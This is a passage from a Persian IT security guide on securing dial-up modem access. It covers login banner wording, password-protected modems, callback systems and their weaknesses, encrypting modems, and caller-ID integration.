‫ﻣﻲﺑﺨﺸﻨﺪ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺁﻧﻬﺎ ﻫﺮﮔﻮﻧﻪ ﻫﺸﺪﺍﺭ ﻳﺎ ﺍﺑﻼﻏﻴﻪ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﻧﻴﺰ ﻗﺮﺍﺭ ﺩﺍﺩ‪ .‬ﺍﻣﺎ ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ‪banner‬ﻫﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻛـﺎﺭ‬
‫ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﻧﻴﺰ ﺳﺎﺩﻩﺗﺮ ﻛﻨﻨﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻬﺎﺟﻤﺎﻧﻲ ﻛﻪ ﺗﻤﺎﻡ ﺗﻠﻔﻨﻬﺎﻱ ﻳﻚ ﻣﻨﻄﻘﻪ ﻳﺎ ﺷﻬﺮ ﺭﺍ ﭘﻮﻳﺶ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺭﻭﻱ ‪banner‬ﻫﺎ‬
‫ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻛﻪ ﺷﻤﺎﺭﺓ ﻣﻮﺩﻡ ﭼﻪ ﺳﺎﺯﻣﺎﻧﻲ ﺭﺍ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺯ ﺁﻭﺭﺩﻥ ﻧﺎﻡ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﺁﻥ‪ ،‬ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﺗﻤﺎﺱ‪،‬‬
‫‪٣٧٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻭ ﻳﺎ ﻫﺮ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺭﺍﻳﺎﻧﺔ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺩﺭ ‪ banner‬ﺧﻮﺩﺩﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﺍﺯ ﻛﻠﻤﺎﺗﻲ ﻛﻪ ﺑﻪ‬
‫ﻫﺮ ﺻﻮﺭﺕ ﻣﻌﻨﺎﻱ "ﺧﻮﺵﺁﻣﺪﮔﻮﻳﻲ" ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﺯ ﻧﻈـﺮ ﻗـﺎﻧﻮﻧﻲ ﺑﻌﻨـﻮﺍﻥ ﺩﻋـﻮﺕ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﻼ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﭽﻪ ﻛﻪ ﺑﺎﻳﺪ ﺩﺭ ‪ banner‬ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﻏﻴﺮﻣﺠﺎﺯ ﺑﺤﺴﺎﺏ ﺁﻳﻨﺪ‪ .‬ﺫﻳ ﹰ‬
‫ﺍﻋﻼﻡ ﻛﻨﻴﺪ ﻛﻪ ﻫﺮﮔﻮﻧﻪ ﺍﺳﺘﻔﺎﺩﺓ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﻣﻤﻨﻮﻉ ﺍﺳﺖ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭﮔﻴﺮﺩ‪) .‬ﺍﻋﻼﻡ ﻧﻜﻨﻴﺪ ﻛﻪ‬ ‫•‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺣﺘﻤﹰﺎ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺗﺤﺖ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺑﺮﺧﻲ ﻗﺮﺍﺭ ﻧﮕﻴﺮﻧﺪ‪ ،‬ﺁﻧﻬﺎ‬
‫ﻛﻪ ﺗﺤﺖ ﭘﻴﮕﺮﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺴﺒﺖ ﺑﻪ ﺍﻋﻤﺎﻝ ﺍﻧﺘﺨﺎﺑﻲ ﺍﻳﻦ ﺳﻴﺎﺳﺖ ﻋﻠﻴﻪ ﺧﻮﺩ ﺍﺯ ﺷﻤﺎ ﺷﻜﺎﻳﺖ ﻛﻨﻨﺪ‪(.‬‬
‫ﺍﻋﻼﻡ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬ ‫•‬
‫ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻋﻼﻡ ﻛﻨﻴﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻢ‪ ،‬ﺩﺭ ﺣﻘﻴﻘﺖ ﭘﺬﻳﺮﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺍﺯ‬ ‫•‬
‫ﺷﺮﺍﻳﻂ ﻛﺎﺭ ﺑﺎ ﺳﻴﺴﺘﻢ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﺑﺮﺧﻲ ﺷﺮﺍﻳﻂ ﺑﻬﺘﺮ ﺍﺳﺖ ﻫﻴﭻ ‪ banner‬ﺧﻮﺵﺁﻣﺪﮔﻮﻳﻲ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻧﻴﺎﻳﺪ‪.‬‬ ‫•‬

‫ﻃﺮﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺗﻠﻔﻦ‪ ،‬ﺍﮔﺮ ﻣﻮﺩﻡ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﻳﻚ ﺧﻂ ﺗﻠﻔﻦ ﺧﺎﺭﺟﻲ ﻣﺘﺼﻞ ﻛﻨﻴﺪ‪ ،‬ﻫﺮ ﻓﺮﺩﻱ ﺩﺭ ﺟﻬﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺁﻥ ﺗﻤﺎﺱ‬
‫ﻻ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ‬‫ﺑﮕﻴﺮﺩ‪ .‬ﻫﺮﭼﻨﺪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭﺟﻪﺍﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺍﺷﺘﺒﺎﻩﻧﺎﭘﺬﻳﺮ ﻧﻴﺴﺘﻨﺪ‪ .‬ﻛـﺎﺭﺑﺮﺍﻥ ﻣﻌﻤـﻮ ﹰ‬
‫ﺿﻌﻴﻒ ﺍﻧﺘﺨﺎﺏ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻭ ﺣﺘﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ﻧﻴﺰ ﺑﻌﻀﹰﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺍﺑﺰﺍﺭ ﻣﺨﺼﻮﺹ ﻛﺸﻒ ﻭ ﻳﺎ ﺣﺪﺱ ﺯﺩﻩ ﺷﻮﻧﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ‬
‫ﺩﻟﻴﻞ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﻭ ﺭﻭﺷﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ ﺣﻔﺎﻇـﺖ ﺑﻴـﺸﺘﺮﻱ‬
‫ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﺩ‪.‬‬

‫ﻣﻮﺩﻣﻬﺎﻱ ﻣﺠﻬﺰ ﺑﻪ ﺭﻣﺰ ﻋﺒﻮﺭ‬


‫ﺍﻳﻦ ﻣﻮﺩﻣﻬﺎ ﭘﻴﺶ ﺍﺯ ﺍﺗﺼﺎﻝ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺑﻪ ﺭﺍﻳﺎﻧﻪ‪ ،‬ﻭﻱ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻧﻤﺎﻳﻨﺪ ﻛﻪ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭﺍﺭﺩ ﻛﻨﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‬
‫ﻣﻌﻤﻮﻟﻲ‪ ،‬ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﺍﻳﻦ ﻣﻮﺩﻣﻬﺎ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ ﺭﺍ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺑﺎ ﺣﺪﺱ ﭘﻲﺩﺭﭘﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﻳﺎ ﺍﻓﺸﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﻳـﻚ ﻓـﺮﺩ ﻣﺠـﺎﺯ‬
‫ﻻ ﺍﻳﻦ ﻗﺒﻴﻞ ﻣﻮﺩﻣﻬﺎ ﺗﻨﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﺗﺎ ﺩﻩ ﺭﻣﺰ ﻋﺒﻮﺭ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻛﻨﻨـﺪ‪ .‬ﺭﻣﺰﻫـﺎﻱ‬
‫ﺑﺮﺍﻱ ﻳﻚ ﻓﺮﺩ ﻏﻴﺮﻣﺠﺎﺯ‪ ،‬ﺧﺪﺷﻪﺩﺍﺭ ﻛﺮﺩ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻋﺒﻮﺭ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻣﻮﺩﻣﻬﺎ ﻧﺒﺎﻳﺪ ﻣﺸﺎﺑﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﻫﻴﭽﻴﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺎﺷﺪ‪.‬‬

‫ﺗﻨﻈﻴﻢ ﺗﻤﺎﺱ ﺑﺎﺯﮔﺸﺘﻲ‬


‫ﻣﻨﻈﻮﺭ ﺍﺯ ﺗﻤﺎﺱ ﺑﺎﺯﮔﺸﺘﻲ ﺗﻨﻈﻴﻤﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﻃﺒﻖ ﺁﻥ ﺷﺨﺼﻲ ﺍﺯ ﺑﻴﺮﻭﻥ ﺑﺎ ﺩﺳﺘﮕﺎﻩ ﺷﻤﺎ ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺑﻪ ﻣﻮﺩﻡ ﻣﺘﺼﻞ ﻣﻲﺷـﻮﺩ‪ ،‬ﺑـﻪ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻧﺤﻮﻱ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺳﻴﺴﺘﻢ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﻗﻄﻊ ﻣﻲﻛﻨﺪ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳـﻚ ﺷـﻤﺎﺭﺓ ﺍﺯ ﭘـﻴﺶ ﺗﻌﻴـﻴﻦﺷـﺪﻩ ﺑـﺎ ﺁﻥ‬
‫ﺷﺨﺺ ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺳﻴﺴﺘﻢ ﺗﻨﻬﺎ ﺑﺎ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﺄﻳﻴﺪﺷﺪﻩ ﺗﻤﺎﺱ ﺧﻮﺍﻫـﺪ‬
‫ﻻ ﺗﻌﺪﺍﺩ ﺷـﻤﺎﺭﻩﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭ‬
‫ﮔﺮﻓﺖ ﻭ ﻟﺬﺍ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺨﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﻭﺍﺩﺍﺭ ﻛﻨﻨﺪ ﻛﻪ ﺑﺎ ﻣﻮﺩﻡ ﺁﻧﻬﺎ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺮﻗﺮﺍﺭ ﻧﻤﺎﻳﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺑﻴﺸﺘﺮ ﻣﻮﺩﻣﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺫﺧﻴﺮﻩ ﺷﻮﻧﺪ ﻣﺤﺪﻭﺩ ﺍﺳﺖ‪.‬‬
‫ﻼ ﻗﻄـﻊ ﻛﻨﻨـﺪ‪ ،‬ﺍﻣـﺎ ﺑـﺎ ﻛﻤـﺎﻝ‬
‫ﺑﺮﺍﻱ ﺻﺤﺖ ﻋﻤﻠﻜﺮﺩ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﻤﺎﺱ ﺑﺎﺯﮔﺸﺘﻲ ﺑﺎﻳﺪ ﺗﻤﺎﺱ ﻭﺍﺭﺩﻩ ﺭﺍ ﭘﻴﺶ ﺍﺯ ﻫﺮ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﻛﺎﻣ ﹰ‬
‫ﻧﺎﺑﺎﻭﺭﻱ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ‪ ،‬ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻬﺘﺮ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ ﺑـﺮﺍﻱ ﺗﻤﺎﺳـﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻃـﺮﻑ‬
‫ﺳﺎﺯﻣﺎﻥ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﺯ ﻣﺠﻤﻮﻋﻪ ﻣﻮﺩﻣﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻧﺴﺒﺖ ﺑﻪ ﺗﻤﺎﺳﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﮔﺮﺩﺩ‪.‬‬
‫ﺍﻣﻜﺎﻥ ﺧﺮﺍﺑﻜﺎﺭﻱ ﺩﺭ ﺳﻴﺴﺘﻢ ﺗﻤﺎﺱ ﺑﺎﺯﮔﺸﺘﻲ ﻛﻪ ﺍﺯ ﺩﻭ ﻣﺠﻤﻮﻋﻪ ﻣﻮﺩﻡ ﻣﺨﺘﻠﻒ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨـﺪ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﻭﺍﺭﺩ‪ .‬ﺍﮔـﺮ ﻣﻬـﺎﺟﻢ ﺳـﻮﺋﻴﭻ‬
‫ﺷﺮﻛﺖ ﺗﻠﻔﻦ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻛﺮﺩﻩ ﺑﺎﺷﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺷﻤﺎﺭﻩﻫﺎﻳﻲ ﻛﻪ ﻣﻮﺩﻡ ﺑـﺮﺍﻱ ﺗﻤـﺎﺱ ﺑـﺎ ﺁﻧﻬـﺎ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ ﺷـﺪﻩ‪ ،‬ﻳـﻚ ﺳﻴـﺴﺘﻢ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٨٠‬‬

‫ﻫﺪﺍﻳﺖ ﺗﻤﺎﺱ‪ ٢٣٨‬ﻧﺼﺐ ﻛﻨﺪ ﻭ ﺗﻤﺎﺳﻬﺎﻱ ﺑﺎﺯﮔﺸﺘﻲ ﺭﺍ ﺑﻪ ﻣﻮﺩﻡ ﺧﻮﺩ ﻣﻨﺘﻘﻞ ﻧﻤﺎﻳﺪ‪ .‬ﺗﻤﺎﺳﻬﺎﻱ ﺑﺎﺯﮔﺸﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻣﻨﻴﺖ ﻛﻠـﻲ ﺳﻴـﺴﺘﻢ ﺭﺍ‬
‫ﺗﻘﻮﻳﺖ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﻧﺒﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﺍﺑﺰﺍﺭ ﺍﺻﻠﻲ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﺑﺮ ﺁﻧﻬﺎ ﺗﻜﻴﻪ ﻛﺮﺩ‪.‬‬

‫ﻣﻮﺩﻣﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭ‬
‫ﺍﻳﻦ ﻣﻮﺩﻣﻬﺎ ﻛﻪ ﺑﺎﻳﺪ ﺟﻔﺖﺟﻔﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ ،‬ﻛﻠﻴﺔ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺳﺎﻟﻲ ﻭ ﺩﺭﻳﺎﻓﺘﻲ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﻣﻮﺩﻣﻬـﺎﻱ‬
‫ﺭﻣﺰﮔﺬﺍﺭ ﺩﺭﺟﺔ ﺑﺎﻻﻳﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍ ‪ -‬ﻧﻪ ﺗﻨﻬﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻗﺼﺪ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺍﺭﻧﺪ‪ ،‬ﺑﻠﻜـﻪ ﺣﺘـﻲ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺍﺳـﺘﺮﺍﻕﺳـﻤﻊ‬
‫ﺗﻠﻔﻨﻲ ﺍﺯ ﺭﻭﻱ ﺳﻴﻢ ﺍﻧﺘﻘﺎﻝ ‪ -‬ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺮﺧﻲ ﻣﻮﺩﻣﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭ ﺣﺎﻭﻱ ﻛﻠﻴﺪ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﺍﺯ ﭘـﻴﺶ ﺗﻌﻴـﻴﻦﺷـﺪﻩ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺗﻨﻬـﺎ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﺟﻔﺘﻲ ﺑﺎ ﻳﻚ ﻣﻮﺩﻡ ﺧﺎﺹ ﺩﻳﮕﺮ ﻛﺎﺭ ﻛﻨﺪ‪ .‬ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﻛﻠﻴﺪﻫﺎﻳﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻃﺒـﻖ ﻳـﻚ ﺭﻭﺍﻝ ﻣـﺸﺨﺺ‬
‫ﺗﻐﻴﻴﺮ ﻳﺎﺑﻨﺪ ﺗﺎ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺗﻤﺎﻡ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﺎﻳﺪ ﮔﻔﺖ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﻣﻮﺩﻣﻬـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺎ‬
‫ﻫﺰﻳﻨﺔ ﻛﻤﺘﺮ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭ ‪ -‬ﻣﺜﻞ ‪ SSH‬ﺭﻭﻱ ﻳﻚ ﺍﺗﺼﺎﻝ ‪ - PPP‬ﻭ ﻣﻮﺩﻣﻬﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻫﻢ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪.‬‬
‫‪٢٣٩‬‬
‫ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ‬
‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻨﺎﻃﻖ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻧﻮﻋﻲ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻨﻲ ﺍﺿﺎﻓﻪ ﺑﻪ ﻧﺎﻡ ﺳﺮﻭﻳﺲ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ ﺍﺯ ﻧـﺎﻡ ﺁﻥ‬
‫ﻻ ﺯﻣﺎﻧﻴﻜﻪ ﺗﻠﻔﻦ ﺷﺮﻭﻉ ﺑﻪ ﺯﻧﮓ ﺯﺩﻥ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻳﻦ ﺷـﻤﺎﺭﺓ‬ ‫ﭘﻴﺪﺍ ﺍﺳﺖ‪ ،‬ﺍﻳﻦ ﺳﺮﻭﻳﺲ‪ ،‬ﺷﻤﺎﺭﺓ ﺗﻠﻔﻦ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺗﻠﻔﻦ ﺭﻭﻱ ﺻﻔﺤﺔ ﻛﻮﭼﻜﻲ ﺩﺭ ﻛﻨﺎﺭ ﺩﺳﺘﮕﺎﻩ ﺗﻠﻔﻦ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﻣﺴﺘﻘﻴﻤﹰﺎ ﻭﺍﺟﺪ ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺷـﻤﺎﺭﻩ‬
‫ﻫﺴﺘﻨﺪ‪ ،‬ﻭ ﭼﻨﺎﻧﭽﻪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻭ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺷﻮﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺷﻤﺎﺭﺓ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺩﺭﻳﺎﻓـﺖ ﻛﺮﺩﻧـﺪ‪ ،‬ﺁﻧـﺮﺍ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭ ﺭﺍﻳﺎﻧﺔ ﻣﻴﺰﺑﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬
‫ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﻳﻜﭙﺎﺭﭼﻪ ﻛﺮﺩﻥ ﺳﺮﻭﻳﺲ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺑﺎ ﺧﺪﻣﺎﺕ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺩﺭﻳﺎﻓﺖ‬ ‫•‬
‫ﻛﻨﻨﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﺁﻧﺮﺍ ﺩﺭ ﻛﻨﺎﺭ ﺯﻣﺎﻥ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﻭ ﻧﺎﻡﻛﺎﺭﺑﺮﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﻪ ﺛﺒﺖ ﺑﺮﺳﺎﻧﻨﺪ‪ .‬ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ‬
